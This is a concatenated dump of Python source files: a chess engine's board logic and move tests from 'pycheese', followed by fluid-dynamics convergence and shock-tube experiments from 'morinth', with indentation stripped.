"""Return if the pieces move to coord is unique for it's type."""
px, py = piece.get_coord()
for other in self.get_player_pieces_like(piece):
if coord in other.get_options()["moves"]:
ox, oy = other.get_coord()
overlapp = ""
if px == ox:
overlapp = "row"
elif py == oy:
overlapp = "rank"
return False, overlapp
return True, ""
def get_player_pieces(self, player: str, board: list[list[Entity]] = None) -> list[Piece]:
"""Get a player's pieces.
Args:
player (str): The player whose pieces shall be returned.
board (`list` of `list` of `Entity`, optional): list representing a board.
Returns:
list: list of the specified player's pieces.
"""
pieces = []
if board is None:
board = self.board
for row in board:
for entity in row:
if isinstance(entity, Piece):
if entity.get_player() == player:
pieces.append(entity)
return pieces
def get_player_king(self, player: Optional[str] = None) -> King:
"""Get the player's king."""
if not player:
player = self.player
for piece in self.get_player_pieces(player):
if isinstance(piece, King):
return piece
def get_player_pieces_like(self, piece: Piece, player: Optional[str] = None) -> list[Piece]:
"""Get the player's piece of the same type as the provided piece."""
if not player:
player = self.player
def like(other: Piece):
return other.__class__ == piece.__class__ and other != piece
pieces = self.get_player_pieces(player)
return list(filter(like, pieces))
def get_player_options(self, player: Optional[str] = None, board: list[list[Entity]] = None,
attacking: bool = False, include_piece_coord: bool = False, save: bool = True) -> list[list[int]]:
"""Find all valid moves of a player's pieces.
Args:
player (`str`): The player whose pieces shall be returned.
board (`list` of `list` of `Entity`, optional): list representing a board.
attacking (`bool`, optional): States if only moves that attack enemy pieces shall be returned.
include_piece_coord (`bool`, optional): States if a pieces coordinate shall be added to it's moves.
Returns:
options: list of all legal moves the player can make.
"""
options = []
if player is None:
player = self.player
if board is None:
board = self.board
for piece in self.get_player_pieces(player, board=board):
moves, others = self.get_piece_options(
piece, attacking=attacking, board=board)
if save:
x, y = piece.get_coord()
self.board[y][x].set_options({
"moves": moves,
"others": others
})
if include_piece_coord:
moves.append(piece.get_coord())
options += moves
return options
def get_other_player_options(self, board: list[list[Entity]] = None,
include_piece_coord: bool = False, save: bool = True) -> list[list[int]]:
"""Find all squares of the enemy attacks.
Args:
board (`list` of `list` of `Entity`, optional): list representing a board.
with_pieces (`bool`, optional): States if a pieces coordinate shall be added to it's moves.
Returns:
list: list of coordinates the enemy attacks.
Todos:
TODO: Add valid example.
"""
if board is None:
board = self.board
return self.get_player_options(self.other_player(), board=board, attacking=True,
include_piece_coord=include_piece_coord, save=save)
def clear(self) -> None:
"""Cleares the boards entities dynamic attributes."""
for y in range(8):
for x in range(8):
entity = self.board[y][x]
entity.set_attacked(False)
if isinstance(entity, Piece):
entity.set_options({"moves": [], "others": []})
entity.set_pinned(False)
entity.set_pinner(None)
self.board[y][x] = entity
def update(self) -> None:
"""Update the board with respect to the new position."""
self.clear()
options = self.get_other_player_options()
for x, y in options:
self.board[y][x].set_attacked(True)
# Check if king is in check.
if self.get_player_king().is_attacked():
self.state = "check"
options = self.get_player_options()
# Update board state.
if self.state == "check":
if options:
self.state = "check"
else:
self.state = "checkmate"
else:
if not options:
self.state = "stalemate"
if self.draw_insufficient_material():
self.state = "draw"
def draw_insufficient_material(self) -> bool:
"""Return if neither player can win."""
return (self.player_insufficient_material("white")
and self.player_insufficient_material("black"))
def player_insufficient_material(self, player):
"""Return if the player has insufficient material to win."""
pieces = self.get_player_pieces(player)
# With Pawm, Rook or Queen the player has sufficient material.
if any(isinstance(piece, (Pawn, Rook, Queen)) for piece in pieces):
return False
# Check if only king or only king and knight or bishop are on the board.
if len(pieces) == 1 or len(pieces) == 2:
return True
# Check if any the player has knights on the board.
if any(isinstance(piece, Knight) for piece in pieces):
return False
bishops = list(filter(lambda piece: isinstance(piece, (Bishop)), pieces))
colors = [self.get_coord_color(piece.get_coord()) for piece in bishops]
# Check if all of the bishops are of the same color.
if all(color == colors[0] for color in colors):
return True
return False
def get_coord_color(self, coord) -> str:
"""Return the color of the square on the board at coord."""
x, y = coord
if (x + y) % 2 == 0:
return "white"
return "black"
def next_turn(self) -> None:
"""Set up the next turn."""
self.player = self.other_player()
self.update()
def other_player(self) -> str:
"""Return the other player with respect to the current player."""
return "white" if self.player == "black" else "black"
def can_player_castle(self, piece: Piece,
find_others: bool, attacking: bool) -> bool:
"""Return if player can castle.
Args:
piece (`Piece`): Selected piece on the chess board.
find_others (`bool`): States if castling shall be considered.
attacking (`bool`): States if only attacking moves shall be added.
Returns:
bool: Can the player castle?
"""
return (
self.state != "check"
and isinstance(piece, King)
and find_others
and not attacking
)
def to_dict(self) -> dict:
"""Return a JSON representation of the board."""
pieces = self.get_player_pieces("white") + self.get_player_pieces("black")
pieces = [piece.to_dict() for piece in pieces]
return {
"state": self.state,
"player": self.player,
"last": self.last,
"pieces": pieces
}
def from_dict(self, json: dict) -> None:
"""Reconstruct the board from JSON."""
self.state = json["state"]
self.player = json["player"]
self.last = json["last"]
self.set(empty_board())
for i in json["pieces"]:
coord = dict_to_coord(i["coord"])
piece = str_to_piece(i["type"], coord, i["player"])
options = i["options"]
piece.set_options({
"moves": dict_to_coord(options["moves"], as_list=True),
"others": options["others"]
})
piece.set_pinned(i["pinned"])
piece.set_pinner(i["pinner"])
x, y = coord
self.board[y][x] = piece
self.update()
def view(self, squares: list[list[int]] = []) -> str:
"""View of the current board.
Args:
squares (`list` of `list` of `int`): list of squares on the chess board that shall be marked.
Returns:
str: A string representation of the chess board.
Example:
>>> board = Board()
>>> print(board.view())
♜ ♞ ♝ ♛ ♚ ♝ ♞ ♜
♟︎ ♟︎ ♟︎ ♟︎ ♟︎ ♟︎ ♟︎ ♟︎
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
♙ ♙ ♙ ♙ ♙ ♙ ♙ ♙
♖ ♘ ♗ ♕ ♔ ♗ ♘ ♖
"""
board = ""
for y, row in enumerate(self.board):
line = ""
for x, square in enumerate(row):
if [x, y] in squares:
line += "⛝ "
else:
line += str(square) + " "
board += line + "\n"
return board
def show(self, squares: list[list[int]] = []) -> None:
"""Show the current board.
Args:
squares (`list` of `list` of `int`): list of squares on the chess board that shall be marked.
"""
print(self.view(squares))
def initial_board() -> list[list[Entity]]:
"""Create a nested list of Entitys that represents the chess board.
Note:
The chess board is build with the position
'a8' at the coordinate (0, 0) (h1 --> (7, 7)).
Reminder: Coordinates have to be translated!
This function is called in the constructor.
Example:
>>> from pycheese.core.board import *
>>> board = Board()
>>> board.set(initial_board())
>>> print(board.show())
♜ ♞ ♝ ♛ ♚ ♝ ♞ ♜
♟︎ ♟︎ ♟︎ ♟︎ ♟︎ ♟︎ ♟︎ ♟︎
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
♙ ♙ ♙ ♙ ♙ ♙ ♙ ♙
♖ ♘ ♗ ♕ ♔ ♗ ♘ ♖
Returns:
list: Nested list of Entitys that represents the chess board.
"""
board = []
board.append([
Rook([0, 0], "black"),
Knight([1, 0], "black"),
Bishop([2, 0], "black"),
Queen([3, 0], "black"),
King([4, 0], "black"),
Bishop([5, 0], "black"),
Knight([6, 0], "black"),
Rook([7, 0], "black"),
])
board.append([Pawn([i, 1], "black") for i in range(8)])
for i in range(4):
board.append([Empty([j, i + 2]) for j in range(8)])
board.append([Pawn([i, 6], "white") for i in range(8)])
board.append([
Rook([0, 7], "white"),
Knight([1, 7], "white"),
Bishop([2, 7], "white"),
Queen([3, 7], "white"),
King([4, 7], "white"),
Bishop([5, 7], "white"),
Knight([6, 7], "white"),
Rook([7, 7], "white"),
])
return board
def empty_board() -> list[list[Entity]]:
"""Create a nested list of Entitys that represents an empty chess board.
Note:
The chess board is build with the position
'a8' at the coordinate (0, 0) (h1 --> (7, 7)).
Reminder: Coordinates have to be translated!
Example:
>>> board = Board()
>>> board.board = empty_board()
>>> board.show()
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡ ⊡
Returns:
list: Nested list of Entitys that represents the chess board.
"""
board = []
for i in range(8):
board.append([Empty([j, i]) for j in range(8)])
return board
def str_to_piece(type: str, coord: list[int], player: str, whitelist: Optional[set] = None) -> Piece:
"""Return a piece via it's type and other params.
Args:
type (str): Name of the class of the `Piece` object.
coord (:obj:`list` of :obj:`int`): Coordinate of the piece on board.
player (str): Name of the piece's player.
whitelist (:obj:`set` of str): Whitelist for piece types.
Returns:
piece: A default piece object of given type and coord as well as player.
Raises:
NotWhitelistedException: The given piece type is not whitelisted!
"""
if whitelist and type not in whitelist:
raise NotWhitelistedException(f"The given piece type is not whitelisted! {type} not in {whitelist}")
switch = {"Pawn": Pawn, "Knight": Knight, "Bishop": Bishop,
"Rook": Rook, "Queen": Queen, "King": King}
return switch[type](coord, player)
```
#### File: test/cases/cases_board_move.py
```python
def case_napoleon_attack() -> dict:
"""Test case for the boards `move` funtion.
To test the function the follow chess game will be played:
1. e4 e5 2. Qf3 Nc6 3. Bc4 d6 4. Qxf7#
"""
return [
{
"source_coord": [4, 6],
"target_coord": [4, 4],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 4, 'y': 6},
'target_coord': {'x': 4, 'y': 4},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [4, 1],
"target_coord": [4, 3],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 4, 'y': 1},
'target_coord': {'x': 4, 'y': 3},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [3, 7],
"target_coord": [5, 5],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 3, 'y': 7},
'target_coord': {'x': 5, 'y': 5},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [1, 0],
"target_coord": [2, 2],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 1, 'y': 0},
'target_coord': {'x': 2, 'y': 2},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [5, 7],
"target_coord": [2, 4],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 5, 'y': 7},
'target_coord': {'x': 2, 'y': 4},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [3, 1],
"target_coord": [3, 2],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 3, 'y': 1},
'target_coord': {'x': 3, 'y': 2},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [5, 5],
"target_coord": [5, 1],
"promotion_target": None,
"output": {
'state': 'checkmate',
'source_coord': {'x': 5, 'y': 5},
'target_coord': {'x': 5, 'y': 1},
'event': {'type': 'captures', 'extra': "unique"}
}
},
]
def case_queen_check_empty() -> dict:
"""Test case for the boards `move` funtion."""
return [
{
"source_coord": [3, 6],
"target_coord": [4, 6],
"promotion_target": None,
"output": {
'state': 'check',
'source_coord': {'x': 3, 'y': 6},
'target_coord': {'x': 4, 'y': 6},
'event': {'extra': 'unique', 'type': 'move'}
}
},
]
def case_rook_checkmate() -> dict:
"""Test case for the boards `move` funtion."""
return [
{
"source_coord": [7, 0],
"target_coord": [6, 0],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 7, 'y': 0},
'target_coord': {'x': 6, 'y': 0},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [0, 1],
"target_coord": [0, 0],
"promotion_target": None,
"output": {
'state': 'checkmate',
'source_coord': {'x': 0, 'y': 1},
'target_coord': {'x': 0, 'y': 0},
'event': {'extra': 'unique', 'type': 'move'}
}
}
]
def case_castle_kingside() -> dict:
"""Test case for the boards `move` funtion.
To test the function the follow chess game will be played:
1. Nf3 Nf6 2. e3 e6 3. Be2 Be7 4. O-O O-O
"""
return [
{
"source_coord": [6, 7],
"target_coord": [5, 5],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 6, 'y': 7},
'target_coord': {'x': 5, 'y': 5},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [6, 0],
"target_coord": [5, 2],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 6, 'y': 0},
'target_coord': {'x': 5, 'y': 2},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [4, 6],
"target_coord": [4, 5],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 4, 'y': 6},
'target_coord': {'x': 4, 'y': 5},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [4, 1],
"target_coord": [4, 2],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 4, 'y': 1},
'target_coord': {'x': 4, 'y': 2},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [5, 7],
"target_coord": [4, 6],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 5, 'y': 7},
'target_coord': {'x': 4, 'y': 6},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [5, 0],
"target_coord": [4, 1],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 5, 'y': 0},
'target_coord': {'x': 4, 'y': 1},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [4, 7],
"target_coord": [6, 7],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 4, 'y': 7},
'target_coord': {'x': 6, 'y': 7},
'event': {'type': 'castle', 'extra': 'kingside'}
}
},
{
"source_coord": [4, 0],
"target_coord": [6, 0],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 4, 'y': 0},
'target_coord': {'x': 6, 'y': 0},
'event': {'type': 'castle', 'extra': 'kingside'}
}
},
]
def case_castle_queenside() -> dict:
"""Test case for the boards `move` funtion.
To test the function the follow chess game will be played:
1. Nc3 Nc6 2. d3 d6 3. Be3 Be6 4. Qd2 Qd7 5. O-O-O O-O-O
"""
return [
{
"source_coord": [1, 7],
"target_coord": [2, 5],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 1, 'y': 7},
'target_coord': {'x': 2, 'y': 5},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [1, 0],
"target_coord": [2, 2],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 1, 'y': 0},
'target_coord': {'x': 2, 'y': 2},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [3, 6],
"target_coord": [3, 5],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 3, 'y': 6},
'target_coord': {'x': 3, 'y': 5},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [3, 1],
"target_coord": [3, 2],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 3, 'y': 1},
'target_coord': {'x': 3, 'y': 2},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [2, 7],
"target_coord": [4, 5],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 2, 'y': 7},
'target_coord': {'x': 4, 'y': 5},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [2, 0],
"target_coord": [4, 2],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 2, 'y': 0},
'target_coord': {'x': 4, 'y': 2},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [3, 7],
"target_coord": [3, 6],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 3, 'y': 7},
'target_coord': {'x': 3, 'y': 6},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [3, 0],
"target_coord": [3, 1],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 3, 'y': 0},
'target_coord': {'x': 3, 'y': 1},
'event': {'extra': 'unique', 'type': 'move'}
}
},
{
"source_coord": [4, 7],
"target_coord": [2, 7],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 4, 'y': 7},
'target_coord': {'x': 2, 'y': 7},
'event': {'type': 'castle', 'extra': 'queenside'}
}
},
{
"source_coord": [4, 0],
"target_coord": [2, 0],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 4, 'y': 0},
'target_coord': {'x': 2, 'y': 0},
'event': {'type': 'castle', 'extra': 'queenside'}
}
},
]
def case_and_king_queen_stalemate():
return [
{
"source_coord": [0, 1],
"target_coord": [5, 1],
"promotion_target": None,
"output": {
'state': 'stalemate',
'source_coord': {'x': 0, 'y': 1},
'target_coord': {'x': 5, 'y': 1},
'event': {'extra': 'unique', 'type': 'move'}
}
}
]
def case_promotion_empty():
return [
{
"source_coord": [0, 1],
"target_coord": [0, 0],
"promotion_target": "Knight",
"output": {
'state': 'draw',
'source_coord': {'x': 0, 'y': 1},
'target_coord': {'x': 0, 'y': 0},
'event': {'extra': 'Knight', 'type': 'promotion'}
}
}
]
def case_promotion_empty_bishop_draw():
return [
{
"source_coord": [0, 1],
"target_coord": [0, 0],
"promotion_target": "Bishop",
"output": {
'state': 'draw',
'source_coord': {'x': 0, 'y': 1},
'target_coord': {'x': 0, 'y': 0},
'event': {'extra': 'Bishop', 'type': 'promotion'}
}
}
]
def case_promotion_empty_bishop_no_draw():
return [
{
"source_coord": [0, 1],
"target_coord": [0, 0],
"promotion_target": "Bishop",
"output": {
'state': 'ongoing',
'source_coord': {'x': 0, 'y': 1},
'target_coord': {'x': 0, 'y': 0},
'event': {'extra': 'Bishop', 'type': 'promotion'}
}
}
]
def case_promotion_checkmate_empty():
return [
{
"source_coord": [0, 1],
"target_coord": [0, 0],
"promotion_target": "Queen",
"output": {
'state': 'checkmate',
'source_coord': {'x': 0, 'y': 1},
'target_coord': {'x': 0, 'y': 0},
'event': {'extra': 'Queen', 'type': 'promotion'}
}
}
]
def case_check_by_castle():
return [
{
"source_coord": [4, 7],
"target_coord": [6, 7],
"promotion_target": None,
"output": {
'state': 'check',
'source_coord': {'x': 4, 'y': 7},
'target_coord': {'x': 6, 'y': 7},
'event': {'type': 'castle', 'extra': 'kingside'}
}
}
]
```
#### File: pycheese/test/test_utils.py
```python
from pycheese.core.utils import Boundary
from pycheese.core.utils import coord_to_dict
from pycheese.core.utils import dict_to_coord
from test.utils import assert_obj_attr
def test_boundary():
"""Test the Boundary class function.
Check if the functions's behavoir is correct.
To do so initialize an instance of the Boundary class
and assert the functions output with different setups.
"""
min, max = 0, 10
boundary = Boundary(min, max)
# Test the attributes.
assert_obj_attr(boundary, "min", min)
assert_obj_attr(boundary, "max", max)
# Test if a boundary behaves correctly with single int.
assert boundary.accepts(min)
for i in range(min, max):
assert boundary.accepts(i)
assert not boundary.accepts(max)
# Test if a boundary behaves correctly with list of int.
for i in range(min, max):
for j in range(min, max):
assert boundary.accepts([i, j])
assert not boundary.accepts([max, max])
assert Boundary(min, min).accepts(min)
def test_coord_to_dict():
x, y = 0, 0
# Test conversion of single coord.
coord = [x, y]
dict = {"x": x, "y": y}
assert coord_to_dict(coord) == dict
# Test conversion of list of coord.
coord = [[x, y]]*2
dict = [dict, dict]
assert coord_to_dict(coord) == dict
# Test special case with empty list.
assert coord_to_dict([]) == []
def test_dict_to_coord():
x, y = 0, 0
# Test conversion of single dict.
dict = {"x": x, "y": y}
coord = [x, y]
assert dict_to_coord(dict) == coord
assert dict_to_coord(dict, as_list=True) == [coord]
# Test conversion of list of coord.
dict = [dict, dict]
coord = [[x, y]]*2
assert dict_to_coord(dict) == coord
assert dict_to_coord(dict, as_list=True) == coord
# Test special case with empty list.
assert dict_to_coord([]) == []
``` |
{
"source": "1uc/morinth",
"score": 2
} |
#### File: 1uc/morinth/gaussian_bump.py
```python
import numpy as np
from matplotlib import rcParams
# matplotlib.rc('text', usetex = True)
rcParams.update({ 'font.family': 'sans-serif',
'font.size': 15,
'xtick.labelsize': 15,
'ytick.labelsize': 15,
'figure.autolayout': True,
'axes.formatter.limits': (-1, 3)})
import matplotlib.pyplot as plt
import pickle
from morinth.equilibrium import IsothermalEquilibrium, IsentropicEquilibrium
from morinth.euler_experiment import EulerExperiment
from morinth.boundary_conditions import Outflow, HydrostaticOutflow
from morinth.visualize import EquilibriumGraphs, DensityGraph, ConvergencePlot, DumpToDisk
from morinth.visualize import CombineIO, EulerGraphs, Markers
from morinth.weno import OptimalWENO, EquilibriumStencil
from morinth.source_terms import BalancedSourceTerm, UnbalancedSourceTerm
from morinth.math_tools import gaussian, l1_error, l1rel_error, linf_error, convergence_rate
from morinth.time_keeper import FixedSteps, PlotNever, PlotLast
from morinth.quadrature import GaussLegendre
from morinth.coding_tools import with_default
from morinth.latex_tables import LatexConvergenceTable
from morinth.euler import LinearGravity, PointMassGravity
from morinth.gaussian_bump import GaussianBumpIC, ExtremeGaussianBumpIC
class EquilibriumExperiment(EulerExperiment):
@property
def gravity(self):
return 1.0
@property
def n_cells(self):
return self._n_cells
@n_cells.setter
def n_cells(self, rhs):
self._n_cells = rhs
@property
def order(self):
return 5
@property
def weno(self):
mode = self.well_balancing
if mode == "wb_o2" or mode == "wb_o4":
return OptimalWENO(EquilibriumStencil(self.grid, self.equilibrium, self.model))
elif mode == "naive":
return OptimalWENO()
else:
raise Exception("Wrong `well_balancing`.")
@property
def thermodynamic_equilibrium(self):
label = self._thermodynamic_equilibrium
if label == "isentropic":
return IsentropicEquilibrium
elif label == "isothermal":
return IsothermalEquilibrium
else:
raise Exception("Unknown equilibrium.")
@thermodynamic_equilibrium.setter
def thermodynamic_equilibrium(self, rhs):
self._thermodynamic_equilibrium = rhs
@property
def boundary_condition(self):
equilibrium = self.thermodynamic_equilibrium(self.grid, self.model)
return HydrostaticOutflow(self.grid, equilibrium)
@property
def source(self):
mode = self.well_balancing
if mode == "wb_o2" or mode == "wb_o4":
source_order = 4.0 if mode == "wb_o4" else 2.0
return BalancedSourceTerm(self.grid, self.model,
self.equilibrium, source_order)
elif mode == "naive":
return UnbalancedSourceTerm(self.grid, self.model)
else:
raise Exception("Wrong `well_balancing`.")
@property
def well_balancing(self):
return self._well_balancing
@well_balancing.setter
def well_balancing(self, rhs):
self._well_balancing = rhs
@property
def equilibrium(self):
mode = self.well_balancing
if mode == "wb_o2" or mode == "wb_o4":
return self.thermodynamic_equilibrium(self.grid, self.model)
elif mode == "naive":
return None
else:
assert Exception("Wrong `well_balancing`.")
@property
def visualize(self):
back_ground = self.initial_condition.back_ground(self.grid)
graphs = EquilibriumGraphs(self.grid,
"img/" + self.output_filename,
self.model,
back_ground)
raw_data = DumpToDisk(self.grid, "data/" + self.output_filename, back_ground)
return CombineIO(graphs, raw_data)
@property
def output_filename(self):
pattern = self.base_filename + "-{:s}_{:s}_res{:05d}"
return pattern.format(self._thermodynamic_equilibrium,
self.well_balancing,
self.n_cells)
class GaussianBump(EquilibriumExperiment):
@property
def final_time(self):
return 8.0
@property
def specific_gas_constant(self):
return 0.01
@property
def domain(self):
return np.array([0, 500])
@property
def initial_condition(self):
equilibrium = self.thermodynamic_equilibrium(self.grid, self.model)
ic = ExtremeGaussianBumpIC(self.model, equilibrium)
ic.p_amplitude, ic.rho_amplitude = 1e-6, 1e-6
return ic
@property
def gravity(self):
return PointMassGravity(gravitational_constant=800.0,
mass=3000.0,
radius=1000.0)
@property
def base_filename(self):
return "extreme_gaussian_bump"
@property
def steps_per_frame(self):
return 5
class GaussianBumpConvergence(GaussianBump):
@property
def plotting_steps(self):
# return super().plotting_steps
return PlotLast()
class GaussianBumpReference(GaussianBumpConvergence):
@property
def well_balancing(self):
return "naive"
@property
def n_cells(self):
return 2**14 + 6
@property
def output_filename(self):
pattern = "extreme_gaussian_bump-{:s}"
return pattern.format(self._thermodynamic_equilibrium)
def compute_reference_solution(Experiment, thermodynamic_equilibrium):
experiment = Experiment()
experiment.thermodynamic_equilibrium = thermodynamic_equilibrium
grid = experiment.grid
u0 = experiment.initial_condition.back_ground(grid)
u_ref = experiment()
filename_base = "data/" + experiment.output_filename
np.save(filename_base + "_background.npy", u0)
np.save(filename_base + "_reference.npy", u_ref)
with open(filename_base + "_grid.pkl", 'wb') as f:
pickle.dump(grid, f)
def load_reference_solution(Experiment, thermodynamic_equilibrium):
experiment = Experiment()
experiment.thermodynamic_equilibrium = thermodynamic_equilibrium
filename_base = "data/" + experiment.output_filename
u0_ref = np.load(filename_base + "_background.npy")
u_ref = np.load(filename_base + "_reference.npy")
with open(filename_base + "_grid.pkl", 'rb') as f:
grid = pickle.load(f)
return u0_ref, u_ref, grid
def down_sample(u_fine, grid_fine, grid_coarse):
"""Compute cell-averages of `u_fine` on the coarse grid."""
if grid_fine.n_dims == 2:
raise Exception("Needs to be implemented.")
ngf = grid_fine.n_ghost
ngc = grid_coarse.n_ghost
ncf = grid_fine.n_cells[0] - 2*ngf
ncc = grid_coarse.n_cells[0] - 2*ngc
r = ncf // ncc
assert r*ncc == ncf
shape = (u_fine.shape[0], -1, r)
u_coarse = np.mean(u_fine[:,ngf:-ngf].reshape(shape), axis=-1)
return u_coarse
class EquilibriumConvergenceRates:
def __call__(self, Experiment, ExperimentReference, thermal_equilibrium):
all_errors, all_rates = [], []
all_labels = self.all_labels
if self.is_reference_solution_required:
compute_reference_solution(ExperimentReference, thermal_equilibrium)
for well_balancing in ["naive", "wb_o2", "wb_o4"]:
# for well_balancing in ["naive", "wb_o4"]:
# for well_balancing in ["wb_o2"]:
# for well_balancing in ["wb_o4"]:
error, rate, resolutions = self.compute_convergence(Experiment,
ExperimentReference,
thermal_equilibrium,
well_balancing)
all_errors += error
all_rates += rate
experiment = ExperimentReference()
experiment.thermodynamic_equilibrium = thermal_equilibrium
filename_base = "".join(["img/code-validation/",
experiment.base_filename,
"-{:s}".format(experiment._thermodynamic_equilibrium)])
latex_table = LatexConvergenceTable(all_errors,
all_rates,
resolutions-6,
all_labels)
latex_table.write(filename_base + ".tex")
plot = ConvergencePlot(self.trend_lines)
plot(all_errors, resolutions-6, all_labels)
plot.save(filename_base)
def compute_convergence(self, Experiment,
ExperimentReference,
thermal_equilibrium,
well_balancing):
u0_ref, u_ref, grid_ref = load_reference_solution(ExperimentReference,
thermal_equilibrium)
du_ref = u_ref - u0_ref
# plt.clf()
# marker = iter(Markers())
# self.plot_delta(grid_ref, u_ref, du_ref, None, next(marker))
resolutions = self.resolutions
err = np.empty((4, resolutions.size))
for l, res in enumerate(resolutions):
experiment = Experiment()
experiment.thermodynamic_equilibrium = thermal_equilibrium
experiment.well_balancing = well_balancing
experiment.n_cells = res
grid = experiment.grid
n_ghost = grid.n_ghost
u0 = experiment.initial_condition.back_ground(grid)
u = experiment()
du = u - u0
du_ref_c = down_sample(du_ref, grid_ref, grid)
# self.plot_delta(grid, u, du, du_ref_c, next(marker))
err[:,l] = l1rel_error(du[:,n_ghost:-n_ghost], du_ref_c, ref=u_ref)
# plt.show()
error_vars = self.error_vars
rates = [convergence_rate(err[k,...], resolutions-6) for k in error_vars]
errors = [err[k,...] for k in error_vars]
return errors, rates, resolutions
def plot_delta(self, grid, u, du, du_ref_c, marker):
n_ghost = grid.n_ghost
x = grid.cell_centers[:,0]
plt.plot(x, du[0,...], marker = marker)
class GaussianBumpConvergenceRates(EquilibriumConvergenceRates):
def __init__(self):
super().__init__()
self.all_labels = ["$\\rho_{(0)}$", "$E_{(0)}$",
"$\\rho_{(1)}$", "$E_{(1)}$",
"$\\rho_{(2)}$", "$E_{(2)}$"]
self.error_vars = [0, 3]
self.resolutions = 2**np.arange(4, 11) + 6
self.is_reference_solution_required = True
self.trend_lines = [5]
if __name__ == "__main__":
sim = GaussianBumpConvergenceRates()
# sim(GaussianBumpConvergence, GaussianBumpReference, "isothermal")
sim(GaussianBumpConvergence, GaussianBumpReference, "isentropic")
```
#### File: 1uc/morinth/shock_tube.py
```python
import numpy as np
from morinth.boundary_conditions import Outflow
from morinth.weno import StableWENO, OptimalWENO
from morinth.rusanov import Rusanov
from morinth.euler_experiment import EulerExperiment
class ShockTubeIC:
"""Toro's shock-tube."""
def __init__(self, model):
self.model = model
def __call__(self, grid):
u0 = np.empty((4, grid.cell_centers.shape[0]))
x_crit = 0.3
is_inside = grid.cell_centers[...,0] < x_crit
u0[0, ...] = np.where(is_inside, 1.0, 0.125)
u0[1, ...] = np.where(is_inside, 0.75, 0.0)
u0[2, ...] = 0.0
u0[3, ...] = np.where(is_inside, 1.0, 0.1)
return self.model.conserved_variables(u0)
class ShockTubeBase(EulerExperiment):
@property
def final_time(self):
return 0.2
@property
def n_cells(self):
return 1000
@property
def flux(self):
return Rusanov(self.model)
@property
def steps_per_frame(self):
return 30
@property
def boundary_condition(self):
return Outflow(self.grid)
@property
def initial_condition(self):
return ShockTubeIC(self.model)
@property
def needs_baby_steps(self):
return True
class ShockTubeO1(ShockTubeBase):
@property
def output_filename(self):
return "img/shock_tube-o1"
@property
def order(self):
return 1
class ENOShockTube(ShockTubeBase):
@property
